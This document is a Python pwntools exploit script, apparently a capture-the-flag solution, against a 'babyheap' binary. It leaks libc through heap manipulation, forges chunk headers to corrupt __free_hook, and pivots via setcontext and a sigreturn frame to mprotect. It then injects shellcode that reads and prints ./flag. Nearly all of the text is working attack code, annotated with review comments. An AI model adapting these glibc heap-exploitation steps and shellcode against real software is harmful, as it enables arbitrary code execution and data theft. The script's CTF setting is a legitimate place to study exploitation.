from pwn import *
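# Target process and binaries. `elf` is loaded but never referenced below;
# `libc` is used for symbol lookups (system, setcontext, mprotect).
sh = process('./babyheap')
elf = ELF('./babyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.arch = "amd64"
# Record the target's PID in a scratch file so an external debugger can attach;
# the file is deleted at the end of the script. This is best-effort: a failure
# here is reported but must not abort the run. The context manager guarantees
# the handle is closed even if the write itself raises.
try:
    with open('pid', 'w') as f:
        f.write(str(proc.pidof(sh)[0]))
except Exception as e:
    print(e)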
def add(size):
    """Menu option 1: request an allocation of *size* bytes.

    Drives the target's text menu over the global `sh` tube and waits for
    the next "Choice: " prompt so the caller is left synchronised.
    """
    exchange = (
        ('1', 'Size: '),
        (str(size), 'Choice: \n'),
    )
    for answer, next_prompt in exchange:
        sh.sendline(answer)
        sh.recvuntil(next_prompt)
def edit(index, content):
    """Menu option 2: write *content* into the entry at *index*.

    *content* is sent raw (no trailing newline) so the exact bytes,
    including any embedded newlines, reach the target. Returns once the
    next "Choice: " prompt has been consumed from the global `sh` tube.
    """
    sh.sendline('2')
    sh.recvuntil('Index: ')
    sh.sendline(str(index))
    sh.recvuntil('Content: ')
    # send(), not sendline(): the payload length is controlled by the caller.
    sh.send(content)
    sh.recvuntil('Choice: \n')
def delete(index):
    """Menu option 3: free the entry at *index*.

    Uses the global `sh` tube and consumes the following "Choice: " prompt.
    """
    replies = (('3', 'Index: '), (str(index), 'Choice: \n'))
    for line, prompt in replies:
        sh.sendline(line)
        sh.recvuntil(prompt)
def show(index):
    """Menu option 4: print the entry at *index* and return its bytes.

    Reads one line from the global `sh` tube, strips the trailing newline,
    then consumes the following "Choice: " prompt before returning.
    """
    sh.sendline('4')
    sh.recvuntil('Index: ')
    sh.sendline(str(index))
    line = sh.recvuntil('\n')
    sh.recvuntil('Choice: \n')
    # Drop the single newline delimiter that recvuntil included.
    return line[:-1]
# NOTE(review): the str/bytes concatenations ('a' * n + p64(...)),
# result.ljust(8, '\0') and str(frame) only work under Python 2 pwntools;
# on Python 3 these mix str and bytes and raise TypeError.
sh.recvuntil('Choice: \n')

# --- stage 1: heap setup and libc leak ---
add(0x80)
add(0x68)
add(0xf8)
add(24)
delete(0)
# Entry 1 is filled and the 8 bytes after its 0x60 payload are overwritten with 0x100.
edit(1,'a' * 0x60 + p64(0x100))
delete(2)
add(0x80)
add(0x80)
delete(2)
# Read entry 1 back and interpret the (zero-padded) bytes as a pointer;
# the name records that it is expected to be main_arena+88.
result = show(1)
main_arena_88_addr = u64(result.ljust(8, '\0'))
log.success("main_arena_88_addr: " + hex(main_arena_88_addr))
main_arena_addr = main_arena_88_addr - 88
log.success("main_arena_addr: " + hex(main_arena_addr))
# Hard-coded for one specific libc build; must match the libc loaded above.
main_arena_offset = 0x3c4b20
libc_addr = main_arena_addr - main_arena_offset
log.success("libc_addr: " + hex(libc_addr))
# Computed and logged but not used anywhere below.
system_addr = libc_addr + libc.symbols['system']
log.success("system_addr: " + hex(system_addr))

# --- stage 2: heap layout ---
# Sequence of allocations, size-field overwrites (the p64(0x500) written
# right after 0x4f0 filler bytes) and frees that arranges the heap.
add(0x160)
add(0x18)
add(0x508)
add(0x18)
add(0x18)
add(0x508)
add(0x18)
add(0x18)
edit(5, 'a'*0x4f0 + p64(0x500))
delete(5)
edit(4, 'a'*(0x18))
add(0x18)
add(0x4d8)
delete(5)
delete(6)
add(0x30)
add(0x4e8)
edit(8, 'a'*(0x4f0) + p64(0x500))
delete(8)
edit(7, 'a'*(0x18))
add(0x18)
add(0x4d8)
delete(8)
delete(9)
add(0x40)
delete(6)
add(0x4e8)
delete(6)

# Hard-coded for the same specific libc build as main_arena_offset above.
__free_hook_offset = 0x3c67a8
__free_hook_addr = libc_addr + __free_hook_offset
storage = __free_hook_addr
fake_chunk = storage - 0x20
# Forged chunk headers (size words 0x4f1 / 0x4e1 and pointers around fake_chunk)
# written into entries 11 and 12.
layout = [ '\x00' * 16, p64(0), p64(0x4f1), p64(0), p64(fake_chunk) ]
edit(11, flat(layout))
layout = [ '\x00' * 32, p64(0), p64(0x4e1), p64(0), p64(fake_chunk + 8), p64(0), p64(fake_chunk - 0x18 - 5) ]
edit(12, flat(layout))
add(0x48)

# --- stage 3: code execution ---
# Page-aligned address derived from __free_hook_addr; used as the mprotect
# target below and as the read buffer / jump target in shellcode1.
new_execve_env = __free_hook_addr & 0xfffffffffffff000
# Line breaks inside this asm literal were restored: one instruction per line.
# It performs a read syscall (eax=0) of up to 0x1000 bytes from fd 0 into rsi,
# then jumps to rsi — i.e. it expects the bytes sent at sh.send(asm(shellcode2)).
shellcode1 = '''
xor rdi, rdi
mov rsi, %d
mov edx, 0x1000
mov eax, 0
syscall
jmp rsi
''' % new_execve_env
# Entry 6: 0x10 filler, setcontext+53, __free_hook_addr+0x10, then shellcode1.
edit(6, 'a' * 0x10 + p64(libc_addr + libc.symbols['setcontext'] + 53) + p64(__free_hook_addr + 0x10) + asm(shellcode1))
# Redundant: context.arch was already set to "amd64" at the top of the file.
context.arch = "amd64"
# Register state for the setcontext gadget: rip -> mprotect(new_execve_env,
# 0x1000, 4|2|1) with rsp pointing just past __free_hook_addr.
frame = SigreturnFrame()
frame.rsp = __free_hook_addr + 8
frame.rip = libc_addr + libc.symbols['mprotect']
frame.rdi = new_execve_env
frame.rsi = 0x1000
frame.rdx = 4 | 2 | 1
# str(frame) is the Python 2 serialisation of the frame (bytes(frame) on Python 3).
edit(12, str(frame))
# Trigger via menu option 3 on index 12. The trailing 'Choice: ' prompt is
# deliberately not consumed: the next thing expected from the target is the
# read issued by shellcode1, which the sh.send() below satisfies.
sh.sendline('3')
sh.recvuntil('Index: ')
sh.sendline('12')
# Line breaks restored here as well (';//' starts an asm comment, so the
# instructions must be on separate lines). open("./flag") -> read(fd, rsp, 1024)
# -> write(1, rsp, count) -> exit(0).
shellcode2 = '''
mov rax, 0x67616c662f2e ;// ./flag
push rax
mov rdi, rsp ;// ./flag
mov rsi, 0 ;// O_RDONLY
xor rdx, rdx ;// 置0就行
mov rax, 2 ;// SYS_open
syscall
mov rdi, rax ;// fd
mov rsi,rsp ;// 读到栈上
mov rdx, 1024 ;// nbytes
mov rax,0 ;// SYS_read
syscall
mov rdi, 1 ;// fd
mov rsi, rsp ;// buf
mov rdx, rax ;// count
mov rax, 1 ;// SYS_write
syscall
mov rdi, 0 ;// error_code
mov rax, 60
syscall
'''
sh.send(asm(shellcode2))
print(sh.recv())
sh.interactive()
# Remove the scratch PID file written at startup.
os.system("rm -f pid")
|